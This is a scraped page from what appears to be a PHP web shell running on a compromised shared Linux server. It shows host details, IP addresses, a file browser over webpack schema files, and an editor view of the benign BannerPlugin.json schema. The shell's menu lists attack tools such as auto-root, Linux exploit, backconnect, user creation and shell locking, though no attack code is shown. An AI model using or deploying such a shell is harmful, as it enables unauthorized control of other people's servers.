Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
webpack /
schemas /
plugins /
[ HOME SHELL ]
Name
Size
Permission
Action
debug
[ DIR ]
drwxr-xr-x
optimize
[ DIR ]
drwxr-xr-x
BannerPlugin.json
2.4
KB
-rw-r--r--
DllPlugin.json
1019
B
-rw-r--r--
DllReferencePlugin.json
5.9
KB
-rw-r--r--
HashedModuleIdsPlugin.json
846
B
-rw-r--r--
IgnorePlugin.json
1005
B
-rw-r--r--
LoaderOptionsPlugin.json
773
B
-rw-r--r--
ProgressPlugin.json
1.47
KB
-rw-r--r--
SourceMapDevToolPlugin.json
5.19
KB
-rw-r--r--
WatchIgnorePlugin.json
430
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : BannerPlugin.json
{ "definitions": { "BannerFunction": { "description": "The banner as function, it will be wrapped in a comment", "instanceof": "Function", "tsType": "(data: { hash: string, chunk: import('../../lib/Chunk'), filename: string, basename: string, query: string}) => string" }, "Rule": { "oneOf": [ { "instanceof": "RegExp", "tsType": "RegExp" }, { "type": "string", "minLength": 1 } ] }, "Rules": { "oneOf": [ { "type": "array", "items": { "description": "A rule condition", "anyOf": [ { "$ref": "#/definitions/Rule" } ] } }, { "$ref": "#/definitions/Rule" } ] } }, "title": "BannerPluginArgument", "oneOf": [ { "title": "BannerPluginOptions", "type": "object", "additionalProperties": false, "properties": { "banner": { "description": "Specifies the banner", "anyOf": [ { "$ref": "#/definitions/BannerFunction" }, { "type": "string" } ] }, "entryOnly": { "description": "If true, the banner will only be added to the entry chunks", "type": "boolean" }, "exclude": { "description": "Exclude all modules matching any of these conditions", "anyOf": [ { "$ref": "#/definitions/Rules" } ] }, "include": { "description": "Include all modules matching any of these conditions", "anyOf": [ { "$ref": "#/definitions/Rules" } ] }, "raw": { "description": "If true, banner will not be wrapped in a comment", "type": "boolean" }, "test": { "description": "Include all modules that pass test assertion", "anyOf": [ { "$ref": "#/definitions/Rules" } ] } }, "required": ["banner"] }, { "$ref": "#/definitions/BannerFunction" }, { "description": "The banner as string, it will be wrapped in a comment", "type": "string", "minLength": 1 } ] }
Close